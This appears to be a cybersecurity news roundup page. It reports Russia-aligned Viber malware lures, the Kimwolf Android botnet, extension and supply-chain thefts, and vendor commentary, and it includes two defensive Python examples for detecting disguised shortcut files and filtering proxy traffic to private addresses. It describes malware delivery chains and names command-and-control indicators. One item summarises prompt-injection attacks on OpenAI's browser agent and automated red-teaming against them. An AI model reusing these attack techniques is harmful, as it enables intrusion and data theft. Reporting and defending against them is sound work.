2026-01-06 AI Startup News

Russia-Aligned Hackers Abuse Viber to Target Ukrainian Military and Government

The Russia-aligned threat actor known as UAC-0184 has been observed targeting Ukrainian military and government entities by leveraging the Viber messaging platform to deliver malicious ZIP archives. “This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025,” the 360 Threat Intelligence Center said in a technical report. Also tracked as Hive0156, the hacking group is primarily known for leveraging war-themed lures in phishing emails to deliver Hijack Loader in attacks targeting Ukrainian entities. The malware loader subsequently acts as a pathway for Remcos RAT infections.

The threat actor was first documented by CERT-UA in early January 2024. Subsequent attack campaigns have been found to leverage messaging apps like Signal and Telegram as a delivery vehicle for malware. The latest findings from the Chinese security vendor point to a further evolution of this tactic. The attack chain involves the use of Viber as an initial intrusion vector to distribute malicious ZIP archives containing multiple Windows shortcut (LNK) files disguised as official Microsoft Word and Excel documents to trick recipients into opening them.

The LNK files are designed to display a decoy document to the victim to lower their suspicion, while silently executing Hijack Loader in the background by fetching a second ZIP archive (“smoothieks.zip”) from a remote server by means of a PowerShell script. The attack reconstructs and deploys Hijack Loader in memory through a multi-stage process that employs techniques like DLL side-loading and module stomping to evade detection by security tools. The loader then scans the environment for installed security software, such as products from Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft, by calculating the CRC32 hash of the corresponding program. Besides establishing persistence by means of scheduled tasks, the loader takes steps to subvert static signature detection before covertly executing Remcos RAT by injecting it into “chime.exe.” The remote administration tool grants the attackers the ability to manage the endpoint, execute payloads, monitor activities, and steal data.
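As an added, defender-side example that is not part of the 360 Threat Intelligence Center report, the following Python scans a ZIP archive for Windows shortcuts posing as Office documents, the lure pattern described above. The archive and its entries are constructed in the script; the ShellLinkHeader signature check goes beyond the text so that a shortcut renamed to a plain document extension is caught as well.

```python
"""Flag Windows shortcut (LNK) files posing as Office documents inside a ZIP.

Added example, not code from the 360 report. Each entry is judged two ways:
by name (a .lnk suffix following a document extension, with optional
whitespace padding that pushes the real extension out of view) and by content
(the ShellLinkHeader magic), so a renamed shortcut is still detected.
"""
import io
import re
import zipfile

# ShellLinkHeader: HeaderSize 0x4C, then LinkCLSID 00021401-0000-0000-C000-000000000046
# in its little-endian on-disk layout.
LNK_MAGIC = bytes.fromhex("4c000000 01140200 0000 0000 c000000000000046")

DOC_EXTS = ("doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "rtf")
# Matches "Report.xlsx.lnk" as well as "Report.xlsx          .lnk".
DISGUISED_NAME = re.compile(r"\.(%s)\s*\.lnk$" % "|".join(DOC_EXTS), re.IGNORECASE)


def classify_entry(name: str, head: bytes) -> list:
    """Return the reasons an archive entry looks like a disguised shortcut."""
    reasons = []
    if DISGUISED_NAME.search(name):
        reasons.append("document-style name ending in .lnk")
    # A shortcut whose extension has been changed entirely is only visible by content.
    if head.startswith(LNK_MAGIC) and not name.lower().rstrip().endswith(".lnk"):
        reasons.append("LNK header but non-.lnk extension")
    return reasons


def scan_zip(data: bytes) -> dict:
    """Scan an in-memory ZIP; report LNK count and per-entry findings."""
    findings = []
    lnk_count = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))   # header bytes are enough to classify
            if head.startswith(LNK_MAGIC):
                lnk_count += 1
            reasons = classify_entry(info.filename, head)
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    # The campaign used several LNK files per archive; more than one is itself a signal.
    return {"lnk_count": lnk_count, "findings": findings,
            "suspicious": bool(findings) or lnk_count > 1}


# Constructed sample names; the padded one hides ".lnk" behind spaces.
PADDED_NAME = "Salary Table.xlsx" + " " * 17 + ".lnk"


def build_sample_archive() -> bytes:
    """Constructed sample archive; the entries are header-only stand-ins, not real shortcuts."""
    fake_lnk = LNK_MAGIC + b"\x00" * 64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2025.docx.lnk", fake_lnk)
        zf.writestr(PADDED_NAME, fake_lnk)
        zf.writestr("Readme.pdf", fake_lnk)            # shortcut renamed to look like a PDF
        zf.writestr("notes.txt", b"plain text, harmless")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_archive())["findings"]:
        print(finding)
```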

“Although marketed as legitimate system management software, its powerful intrusive capabilities make it frequently used by various malicious attackers for cyber espionage and data theft activities,” the 360 Threat Intelligence Center said. “Through the graphical user interface (GUI) control panel provided by Remcos, attackers can perform batch automated management or precise manual interactive operations on the victim’s host.”

Kimwolf Android Botnet Infects Over 2 Million Devices via Exposed ADB and Proxy Networks

The botnet known as Kimwolf has infected more than 2 million Android devices by tunneling through residential proxy networks, according to findings from Synthient. “Key actors involved in the Kimwolf botnet are observed monetizing the botnet through app installs, selling residential proxy bandwidth, and selling its DDoS functionality,” the company said in an analysis published last week. Kimwolf was first publicly documented by QiAnXin XLab last month, while documenting its connections to another botnet known as AISURU. Active since at least August 2025, Kimwolf is assessed to be an Android variant of AISURU.

There is growing evidence to suggest that the botnet is actually behind a series of record-setting DDoS attacks late last year. The malware turns infected systems into conduits for relaying malicious traffic and orchestrating distributed denial-of-service (DDoS) attacks at scale. The vast majority of the infections are concentrated in Vietnam, Brazil, India, and Saudi Arabia, with Synthient observing approximately 12 million unique IP addresses per week. Attacks distributing the botnet have been primarily found to target Android devices running an exposed Android Debug Bridge (ADB) service using a scanning infrastructure that uses residential proxies to install the malware.

No less than 67% of the devices connected to the botnet are unauthenticated and have ADB enabled by default. It’s suspected that these devices come pre-infected with software development kits (SDKs) from proxy providers so as to surreptitiously enlist them in the botnet. The top compromised devices include unofficial Android-based smart TVs and set-top boxes. As recently as December 2025, Kimwolf infections have leveraged proxy IP addresses offered for rent by China-based IPIDEA, which implemented a security patch on December 27 to block access to local network devices and various sensitive ports.

IPIDEA describes itself as the “world’s leading provider of IP proxy” with more than 6.1 million daily updated IP addresses and 69,000 daily new IP addresses. In other words, the modus operandi is to leverage IPIDEA’s proxy network and other proxy providers, and then tunnel through the local networks of systems running the proxy software to drop the malware. The main payload listens on port 40860 and connects to 85.234.91[.]247:1337 to receive further commands. “The scale of this vulnerability was unprecedented, exposing millions of devices to attacks,” Synthient said.

Furthermore, the attacks infect the devices with a bandwidth monetization service known as Plainproxies Byteconnect SDK, indicating broader attempts at monetization. The SDK uses 119 relay servers that receive proxy tasks from a command-and-control server, which are then executed by the compromised device. Synthient said it detected the infrastructure being used to conduct credential-stuffing attacks targeting IMAP servers and popular online websites. “Kimwolf’s monetization strategy became apparent early on through its aggressive sale of residential proxies,” the company said.

“By offering proxies as low as 0.20 cents per GB or $1.4K a month for unlimited bandwidth, it would gain early adoption by several proxy providers.” “The discovery of pre-infected TV boxes and the monetization of these bots through secondary SDKs like Byteconnect indicates a deepening relationship between threat actors and commercial proxy providers.” To counter the risk, proxy providers are recommended to block requests to RFC 1918 addresses, which are private IP address ranges defined for use in private networks. Organizations are advised to lock down devices running unauthenticated ADB shells to prevent unauthorized access.
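An added example, not code from Synthient or any proxy provider, of the egress filter the recommendation above describes: a relay node refuses proxied requests whose destination falls in an RFC 1918 range. It generalizes slightly by also refusing loopback and link-local ranges and by checking resolved hostnames; the resolver is a constructed lookup table so the script runs offline.

```python
"""Egress filter for a residential-proxy relay (added example).

Refuses proxied requests whose destination is an RFC 1918 private address.
Assumptions beyond the text: loopback, link-local and IPv6 private ranges are
refused too, hostnames are resolved before the check, and a host that does not
resolve is refused (fail closed).
"""
import ipaddress
from typing import Callable, Optional, Tuple
from urllib.parse import urlsplit

# RFC 1918 private ranges named in the article.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Further non-routable ranges (assumption: a provider would refuse these as well).
EXTRA_BLOCKED = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8",     # IPv4 loopback
    "169.254.0.0/16",  # IPv4 link-local
    "::1/128",         # IPv6 loopback
    "fc00::/7",        # IPv6 unique local
    "fe80::/10",       # IPv6 link-local
)]


def blocked_range(addr: str):
    """Return the blocked network containing addr, or None if addr is routable."""
    ip = ipaddress.ip_address(addr)
    # An IPv4-mapped IPv6 literal such as ::ffff:10.0.0.1 must be judged as IPv4,
    # otherwise it slips past the IPv4 range checks.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    for net in RFC1918 + EXTRA_BLOCKED:
        if ip in net:          # membership of a different IP version is simply False
            return net
    return None


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_request(url: str, resolve: Callable[[str], list]) -> Tuple[bool, str]:
    """Decide whether the relay may forward the request. Returns (allowed, reason)."""
    host = urlsplit(url).hostname      # strips port and IPv6 brackets
    if not host:
        return False, "no host in request"
    # Resolve names so a hostname pointing at a private address is caught as well.
    addrs = [host] if is_ip_literal(host) else resolve(host)
    if not addrs:
        return False, f"{host} did not resolve; refusing (fail closed)"
    for addr in addrs:
        net = blocked_range(addr)
        if net is not None:
            return False, f"{host} -> {addr} is in blocked range {net}"
    return True, f"{host} -> {', '.join(addrs)} is routable"


# Constructed resolver standing in for DNS so the example runs offline.
FAKE_DNS = {
    "example.invalid": ["203.0.113.10"],
    "router.lan": ["10.0.0.1"],   # a name that points into the relay's own LAN
}


def fake_resolve(host: str) -> list:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for url in ("http://192.168.1.20:5555/", "http://[::ffff:10.1.2.3]/",
                "http://router.lan/", "https://example.invalid/", "http://nosuch.invalid/"):
        print(check_request(url, fake_resolve))
```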

⚡ Weekly Recap: IoT Exploits, Wallet Breaches, Rogue Extensions, AI Abuse & More

The year opened without a reset. The same pressure carried over, and in some places it tightened. Systems people assume are boring or stable are showing up in the wrong places. Attacks moved quietly, reused familiar paths, and kept working longer than anyone wants to admit.

This week’s stories share one pattern. Nothing flashy. No single moment. Just steady abuse of trust — updates, extensions, logins, messages — the things people click without thinking.

That’s where damage starts now. This recap pulls those signals together. Not to overwhelm, but to show where attention slipped and why it matters early in the year.

⚡ Threat of the Week

RondoDox Botnet Exploits React2Shell Flaw — A persistent nine-month-long campaign has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector. React2Shell is the name assigned to a critical security vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to statistics from the Shadowserver Foundation, there are about 84,916 instances that remain susceptible to the vulnerability as of January 4, 2026, out of which 66,200 instances are located in the U.S., followed by Germany (3,600), France (2,500), and India (1,290).

A New Framework for Identity Security in the AI Era — In 2026, the security landscape is littered with unmanaged threats, including AI tools, SaaS apps, devices, and identities. Join 1Password CPO Abe Ankumah and security analyst Francis Odum to hear how security and IT leaders are taking control – without slowing down the pace of innovation. Join the webinar ➝

🔔 Top News

Trust Wallet Chrome Extension Hack Traced to Shai-Hulud Supply Chain Attack — Trust Wallet revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. “Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key,” the company said. “The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet’s standard release process, which requires internal approval/manual review.” The unknown threat actors are said to have registered a domain to exfiltrate users’ wallet mnemonic phrases.

Koi’s analysis found that directly querying the server to which the data was exfiltrated returned the response “He who controls the spice controls the universe,” a Dune reference that echoes similar references observed in the Shai-Hulud npm incident. There is evidence to suggest that preparations for the hack were underway since at least December 8, 2025.

DarkSpectre Linked to Massive Browser Extension Campaigns — A newly uncovered Chinese threat group, DarkSpectre, has been linked to one of the most widespread browser-extension malware operations discovered to date, compromising more than 8.8 million users of Chrome, Edge, Firefox, and Opera over the past seven years. DarkSpectre’s structure differs from that of traditional cybercrime operations.

The group has been found to run disparate but interconnected malware clusters, each with distinct goals. The ShadyPanda campaign, responsible for 5.6 million infections, focuses on long-term user surveillance and e-commerce affiliate fraud. The second campaign, GhostPoster, spreads via Firefox and Opera extensions that conceal malicious payloads in PNG images via steganography. After lying dormant for several days, the extensions extract and execute JavaScript hidden within images, enabling stealthy remote code execution.

This campaign has affected over one million users and relies on domains like gmzdaily.com and mitarchive.info for payload delivery. The most recent discovery, The Zoom Stealer, exposes around 2.2 million users to corporate espionage. The discovery reveals a highly organized criminal organization that has devoted itself to steadily churning out legitimate-looking browser extensions that sneak in malicious code.

U.S. Treasury Lifts Sanctions on 3 Individuals Connected to Intellexa — The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) removed three individuals linked to the Intellexa Consortium, the holding company behind a commercial spyware known as Predator, from the specially designated nationals list. They included Merom Harpaz, Andrea Nicola Constantino Hermes Gambazzi, and Sara Aleksandra Fayssal Hamou. In a statement shared with Reuters, the Treasury said the removal “was done as part of the normal administrative process in response to a petition request for reconsideration.” The department added that the individuals had “demonstrated measures to separate themselves from the Intellexa Consortium.”

Silver Fox Strikes India with Tax Lures — The Chinese cybercrime group known as Silver Fox has turned its focus to India, using income tax-themed lures in phishing campaigns to distribute a modular remote access trojan called ValleyRAT (aka Winos 4.0).

In the campaign, phishing emails containing decoy PDFs purported to be from India’s Income Tax Department are used to deploy ValleyRAT, a variant of Gh0st RAT that implements a plugin-oriented architecture to extend its functionality in an ad hoc manner, thereby allowing its operators to deploy specialized capabilities to facilitate keylogging, credential harvesting, and defense evasion. The disclosure came as a link management panel associated with Silver Fox was identified as being used to keep track of the web pages used to deliver fake installers containing ValleyRAT and the number of clicks to download the installers. An analysis of the origin IP addresses that have clicked on the download links has revealed that at least 217 clicks originated from China, followed by the U.S. (39), Hong Kong (29), Taiwan (11), and Australia (7).

Mustang Panda Uses Rootkit Driver to Deliver TONESHELL — The Chinese hacking group known as Mustang Panda (aka HoneyMyte) leveraged a previously undocumented kernel-mode rootkit driver to deliver a new variant of backdoor dubbed TONESHELL in a cyber attack detected in mid-2025 targeting an unspecified entity in Asia. The main objective of the driver is to inject a backdoor trojan into the system processes and provide protection for malicious files, user-mode processes, and registry keys. The final payload deployed as part of the attack is TONESHELL, an implant with reverse shell and downloader capabilities to fetch next-stage malware onto compromised hosts. The use of TONESHELL has been attributed to Mustang Panda since at least late 2022.

The command-and-control (C2) infrastructure used for TONESHELL is said to have been erected in September 2024, although there are indications that the campaign itself did not commence until February 2025.

🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-13915 (IBM API Connect), CVE-2025-52691 (SmarterTools SmarterMail), CVE-2025-47411 (Apache StreamPipes), CVE-2025-48769 (Apache NuttX RTOS), CVE-2025-14346 (WHILL Model C2 Electric Wheelchairs and Model F Power Chairs), CVE-2025-52871, CVE-2025-53597 (QNAP), CVE-2025-59887, and CVE-2025-59888 (Eaton UPS Companion).

📰 Around the Cyber World

200 Security Incidents Target Crypto in 2025 — According to “incomplete statistics” from blockchain security firm SlowMist, 200 security breaches occurred last year, impacting the crypto community, resulting in losses of around $2.935 billion. “In comparison, 2024 saw 410 incidents with around $2.013 billion in losses,” the company said. “While the number of incidents declined year-over-year, the total amount of losses increased by approximately 46%.”

PyPI Says 52% of Active Users Have 2FA Enabled — The Python Software Foundation said 52% of active PyPI users are now using two-factor authentication to secure their accounts, and that more than 50,000 projects are using trusted publishing. Some of the other notable security measures rolled out in the Python Package Index (PyPI) include warning users about untrusted domains, preventing attacks involving malicious ZIP files, flagging potential typosquatting attempts during project creation, periodically checking for expired domains to prevent domain resurrection attacks, and prohibiting registrations from specific domains that were a source of abuse.

TikTok Takes Down Influence Network Targeting Hungary — TikTok said it took down a network of 95 accounts with 131,342 followers that operated from Hungary and targeted audiences in the country. “The individuals behind this network created inauthentic accounts in order to amplify narratives favorable to the Fidesz political party,” the social media platform said. “The network was found to coordinate across multiple online platforms.”

Handala Team Breaches Telegram Account of Israeli Officials — The pro-Iranian group known as Handala broke into the Telegram accounts of two prominent Israeli political figures, including former Prime Minister Naftali Bennett and Tzachi Braverman, Netanyahu’s Chief of Staff. “The most probable attack vectors include social engineering or spear phishing targeting passwords and OTPs, the exfiltration of Telegram Desktop session files (tdata) from compromised workstations, or unauthorized access to cloud backups,” KELA said. “While the scope of the breach was likely exaggerated by Handala, the incident highlights the critical need for session management and MFA, even on ‘secure’ messaging apps.” In late November 2025, the group also published a list of Israeli high-tech and aerospace professionals, misleadingly describing them as criminals.

Flaws in Bluetooth Headphones Using Airoha Chips Detailed — More details have emerged about three vulnerabilities impacting Bluetooth headphones using Airoha chips: CVE-2025-20700, CVE-2025-20701, and CVE-2025-20702. The flaws impacted headphones from Sony, Marshall, JBL, and Beyerdynamic, and were patched back in June. The issues could be exploited by an attacker in physical proximity to silently connect to a pair of headphones via BLE or Classic Bluetooth, exfiltrate the flash memory of the headphones, and extract the Bluetooth Link Key. This, in turn, allows the attacker to impersonate a “Bluetooth” device, connect to a target’s phone, and interact with it from the privileged position of a trusted peripheral, including even eavesdropping on conversations and extracting call history and stored contacts.

Ransomware Turns Breaches into Bidding Wars — Ransomware’s evolution from digital extortion into a “structured, profit-driven criminal enterprise” has paved the way for an ecosystem that not only attempts to ransom stolen data, but also monetizes for maximum profit by selling it to the highest bidder through data auctions. “By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations,” Rapid7 said. “The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity.”

Teams Notifications Abused for Callback Phishing — Threat actors are abusing Microsoft Teams notifications for callback phishing attacks. “Victims are invited to groups where team names contain the scam content, such as fake invoices, auto-renewal notices, or PayPal payment claims, and are urged to call a fake support number if the charge was not authorized. Because these messages come from the official Microsoft Teams sender address (no-reply@teams.mail[.]microsoft), they may bypass user suspicion and email filters,” Trustwave said.

Teams Vishing Attack Leads to .NET Malware — In another campaign spotted by the security vendor, a vishing campaign originating from Teams has been found to trick unsuspecting users into installing Quick Assist software, ultimately leading to the deployment of a multi-stage .NET malware using an executable named updater.exe. “The Victim receives a Teams call from an attacker impersonating Senior IT Staff,” it said. “Attacker convinces user to launch Quick Assist. The ‘updater.exe’ is a .NET Core 8.0 wrapper with embedded “loader.dll” that downloads encryption keys from jysync[.]info, retrieves encrypted payload, decrypts using AES-CBC + XOR, then loads assembly directly into memory for fileless execution via reflection.”

SEO Poisoning Distributes Oyster — A search engine optimization (SEO) poisoning campaign has continued to promote fake sites when users search for Microsoft Teams or Google Meet to distribute a backdoor called Oyster. This malware distribution threat has been active since at least November 2024. In July 2025, Arctic Wolf said it observed a similar wave of attacks that leveraged bogus sites hosting trojanized versions of legitimate tools like PuTTY and WinSCP to deliver the malware. Oyster is delivered via a loader component that’s responsible for dropping the main component. The main payload then gathers system information, communicates with a C2 server, and provides the ability to remotely execute code.

Fake SAP Concur Extensions Deliver FireClient Malware — A new campaign discovered by BlueVoyant is deceiving users into downloading fake SAP Concur browser extensions. The fake browser extension installer contains a loader designed to gather host information and send it to its C2 server. The loader subsequently extracts an embedded backdoor called FireClient that contains functionality to execute remote commands using the command console and PowerShell. It’s assessed that the malware is distributed via malvertising, hijacking search queries for “Concur log in” on search engines like Bing. The starting point is an MSI installer that deploys a portable version of Firefox to the directory “LOCALAPPDATA\Programs\Firefox” in a deliberate effort to evade detection and avoid conflicts with existing Firefox installations. “After installation, the MSI file launches Firefox in headless mode, meaning the browser runs without a visible window, making its execution undetectable to the user,” researchers Joshua Green and Thomas Elkins said. “Once Firefox is running, the user’s default browser is opened and redirected to the legitimate Concur website. This tactic is intended to create the illusion that the extension installation was successful, thereby deceiving the user.” In the background, the malware proceeds to overwrite configuration files located within Firefox profile directories to induce the browser to launch the loader DLL. BlueVoyant’s analysis has uncovered tactical and infrastructural overlaps with GrayAlpha (aka FIN7), which was previously observed leveraging fake browser update websites as part of its operations. “The FireClient malware likely represents a sophisticated component of GrayAlpha’s evolving toolkit, deployed within a multi-pronged campaign leveraging a variety of trusted software lures,” the company said.

OpenAI Says Prompt Injections May Never Go Away in Browser Agents — OpenAI disclosed that it shipped a security update to its ChatGPT Atlas browser with a newly adversarially trained model and strengthened surrounding safeguards to better combat prompt injections, which makes it possible to conceal malicious instructions within online content and cause the artificial intelligence (AI) agent to override its guardrails.

The company conceded that “agent mode” in ChatGPT Atlas broadens the security threat surface. “This update was prompted by a new class of prompt-injection attacks uncovered through our internal automated red teaming,” it said. The AI company said it built an LLM-based automated attacker and trained it with reinforcement learning to look for prompt injections that can successfully attack a browser agent. “Prompt injection, much like scams and social engineering on the web, is unlikely to ever be fully ‘solved,’” it added.

“But we’re optimistic that a proactive, highly responsive rapid response loop can continue to materially reduce real-world risk over time. By combining automated attack discovery with adversarial training and system-level safeguards, we can identify new attack patterns earlier, close gaps faster, and continuously raise the cost of exploitation.” The changes are in line with similar approaches undertaken by Anthropic and Google to fight the persistent risk of prompt-based attacks. The development comes as Microsoft revealed that adversaries have begun implementing AI across a range of malicious activities, including automated vulnerability discovery or phishing campaigns, malware or deepfake generation, data analysis, influence operations, and crafting convincing fraudulent messages. “AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts – a 4.5x increase,” it said. “AI enables more targeted phishing and better phishing lures.”

🎥 Cybersecurity Webinars

Defeating “Living off the Land”: Proactive Security for 2026

  • To stay ahead of evolving threats, defenders must move beyond traditional file-based detection toward proactive, AI-powered visibility. This session reveals how to catch “living off the land” and fileless attacks that use legitimate system tools to bypass legacy security. You’ll learn how to secure developer workflows and encrypted traffic using Zero Trust principles, ensuring that even the most stealthy, binary-less threats are neutralized before they reach your endpoints.

How to Scale AI Agents Without Scaling Your Attack Surface

  • As developers use AI agents like Claude Code and Copilot to ship code at warp speed, they are unknowingly introducing new risks through unmanaged “MCP” servers and hidden API keys. This webinar explains how to secure these autonomous tools before they become backdoors for data theft or remote attacks. Join us to learn how to identify malicious tools in your environment and enforce the security policies needed to keep your organization fast but safe.

Scaling Your MSSP: High-Margin CISO Services Powered by AI

  • In 2026, staying competitive as an MSSP requires moving beyond manual labor to AI-driven security management. This session explores how leading providers are using automation to slash workloads and deliver high-value CISO services without increasing headcount. By joining industry experts David Primor and Chad Robinson, you’ll learn proven strategies to package tier-based offerings, boost profit margins, and empower your existing team to deliver expert-level results at scale.

🔧 Cybersecurity Tools

rnsec

  • It is a lightweight command-line security scanner for React Native and Expo apps. It runs with no configuration, analyzes the code statically, and flags common security issues such as hardcoded secrets, insecure storage, weak crypto, and unsafe network usage. Results are delivered as a simple HTML or JSON report, making it easy to review locally or plug into CI pipelines.

Duplicati

  • It is a free, open-source backup tool that encrypts your data before sending it to cloud storage or remote servers. It supports incremental and compressed backups, runs on Windows, macOS, and Linux, and works with many providers like S3, Google Drive, OneDrive, and SFTP. Backups can be scheduled automatically and managed through a simple web interface or the command line.

Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

Conclusion

What matters is not any single incident, but what they show together.

The same weaknesses keep getting tested from different angles. When something works once, it gets reused, copied, and scaled. That pattern is clear before the details even matter. Use this recap as a check, not a warning.

If these issues feel familiar, that’s the point. Familiar problems are the ones most likely to be missed again.

The State of Cybersecurity in 2025: Key Segments, Insights, and Innovations

Cybersecurity is being reshaped by forces that extend beyond individual threats or tools. As organizations operate across cloud infrastructure, distributed endpoints, and complex supply chains, security has shifted from a collection of point solutions to a question of architecture, trust, and execution speed. This report examines how core areas of cybersecurity are evolving in response to that shift. Across authentication, endpoint security, software supply chain protection, network visibility, and human risk, it explores how defenders are adapting to adversaries that move faster, blend technical and social techniques, and exploit gaps between systems rather than weaknesses in any single control.

Download the Full Report Here: https://papryon.live/report

Authentication — Yubico

Authentication is evolving from password-based verification to cryptographic proof of possession. As phishing and AI-driven impersonation scale, identity has become the primary control point for security. Hardware-backed authentication and passkeys are emerging as the most reliable defense against credential theft.

“Hackers aren’t breaking in — they’re logging in. In an AI-driven threat environment, authentication has to be hardware-bound and phishing-resistant.” — Ronnie Manning, Chief Brand Advocate, Yubico
Website: yubico.com
LinkedIn: https://www.linkedin.com/company/yubico/

SaaS Data Security — Metomic

As organizations rely on dozens of SaaS platforms, sensitive data is increasingly fragmented and overexposed. Traditional governance models struggle to track unstructured, collaborative data — especially as AI tools ingest and interpret it automatically.

“Most companies don’t know where their sensitive data is, who has access to it, or what their AI tools are doing with it.” — Ben van Enckevort, CTO & Co-founder, Metomic
Website: Metomic.io
LinkedIn: https://www.linkedin.com/company/metomic/

Network Detection & Response — Corelight

Encrypted traffic and hybrid infrastructure have made network visibility harder — but also more essential. Network telemetry remains the most objective record of attacker behavior, enabling defenders to reconstruct incidents and validate what truly happened.

“As AI reshapes security, the organizations that win will be those that know, and can prove, exactly what happened on their network.” — Vincent Stoffer, Field CTO, Corelight
Website: Corelight.com
LinkedIn: https://www.linkedin.com/company/corelight/

AI in Cybersecurity — Axiado

Attack velocity now exceeds the capabilities of software-only defenses. This is driving security closer to the hardware layer, where AI can monitor and respond at the source of computation — before attackers establish control.

“Software-only security can’t keep up. The future of defense is hardware-anchored and AI-driven.” — Gopi Sirineni, Founder & CEO, Axiado
Website: Axiado.com
LinkedIn: https://www.linkedin.com/company/axiado/

Human Risk Management — usecure

Most breaches still involve human behavior, yet traditional awareness training has failed to reduce risk meaningfully. Human risk management is shifting toward continuous measurement, behavioral insight, and adaptive intervention.

“Human risk management is about understanding why risky behavior happens — and changing it over time.” — Jordan Daly, Chief Marketing Officer, usecure
Website: usecure.io
LinkedIn: https://www.linkedin.com/company/usecure/

Network Security — SecureCo

Even encrypted communications leak valuable metadata. Attackers increasingly rely on traffic analysis rather than decryption to map networks and plan attacks. Securing data in transit now requires concealing context, not just content.

“Adversaries don’t need to break encryption to map a network — they can track patterns, endpoints, and behaviors.” — Eric Sackowitz, CTO & Co-Founder, SecureCo
Website: secureco.io
LinkedIn: https://www.linkedin.com/company/secureco/

Software Supply Chain Security — Unknown Cyber

Modern software supply chains increasingly deliver compiled binaries assembled from open-source, third-party, and AI-generated components — often without full visibility. Binary-level verification is emerging as the most reliable way to establish trust in what software actually does once it enters an environment.

“The problem is limited visibility into software supply chains — and that problem is only amplified with the rise of open-source and AI-generated code.” — James Hess, Founder & CEO, Unknown Cyber
Website: unknowncyber.com
LinkedIn: https://www.linkedin.com/company/unknown-cyber/

Open-Source Intelligence (OSINT) — ShadowDragon

OSINT has moved from manual research to targeted, real-time investigation. Ethical, selector-based collection is replacing bulk scraping, enabling defensible intelligence without data hoarding or predictive profiling.

“Most organizations still underestimate how much threat activity is detectable through publicly available data.” — Jonathan Couch, CEO, ShadowDragon
Website: shadowdragon.io
LinkedIn: https://www.linkedin.com/company/shadowdragon/

Endpoint Security & Threat Detection — CrowdStrike

Attackers now move laterally within minutes, making speed the defining factor in breach prevention. Endpoint security is consolidating around behavioral telemetry, automation, and adversary intelligence.

“We’re up against time when it comes to the more sophisticated threat actors.” — Zeki Turedi, Field CTO Europe, CrowdStrike
Website: crowdstrike.com
LinkedIn: https://www.linkedin.com/company/crowdstrike/

Autonomous Endpoint Security — SentinelOne

As environments decentralize, security teams are prioritizing autonomous platforms that reduce manual effort and accelerate response. AI-driven investigation and natural-language querying are becoming operational necessities.

“We’re trying to simplify our AI for our customers so they can better digest it.” — Meriam El Ouazzani, Regional Sales Senior Director, SentinelOne
Website: sentinelone.com
LinkedIn: https://www.linkedin.com/company/sentinelone/

Download The Full Report Here: https://papryon.live/report

This article is a contributed piece from one of our valued partners.

Bitfinex Hack Convict Ilya Lichtenstein Released Early Under U.S. First Step Act

Ilya Lichtenstein, who was sentenced to prison last year on money laundering charges in connection with his role in the massive 2016 hack of cryptocurrency exchange Bitfinex, said he has been released early. In a post shared on X last week, the 38-year-old announced his release, crediting U.S. President Donald Trump’s First Step Act. According to the Federal Bureau of Prisons’ inmate locator, Lichtenstein is scheduled for release on February 9, 2026.

“I remain committed to making a positive impact in cybersecurity as soon as I can,” Lichtenstein added. “To the supporters, thank you for everything. To the haters, I look forward to proving you wrong.” The First Step Act, signed into law by the Trump administration in 2018, is bipartisan legislation that aims to improve criminal justice outcomes and reduce the federal prison population through a series of reforms, including by establishing a “risk and needs assessment system” to gauge recidivism risk and chart a path to early release in some cases. Lichtenstein and his wife, Heather Rhiannon “Razzlekhan” Morgan, pleaded guilty in 2023 in connection with the Bitfinex hack, following their arrest in February 2022.

The 2016 security breach enabled Lichtenstein to fraudulently authorize more than 2,000 transactions, transferring 119,754 bitcoin (then worth approximately $71 million) from Bitfinex to a cryptocurrency wallet in his control. Law enforcement authorities also recovered approximately 94,000 bitcoin (valued at around $3.6 billion in 2022), making it one of the largest seizures in the history of the U.S. In January 2025, U.S. prosecutors filed a motion for the recovered assets to be returned to Bitfinex.

Blockchain intelligence firm TRM Labs said Lichtenstein exploited a vulnerability in Bitfinex’s multi-signature withdrawal setup to initiate and authorize withdrawals from Bitfinex without requiring approvals from BitGo, a third-party digital asset trust company. While the illicit proceeds were subsequently converted to other cryptocurrencies and funneled through mixing services like Bitcoin Fog, the couple’s role came to light following the purchase of Walmart gift cards using the stolen bitcoin at an unnamed virtual currency exchange. The gift cards were redeemed using Walmart’s iPhone app under an account in Morgan’s name. Lichtenstein was sentenced to five years in prison in November 2024.

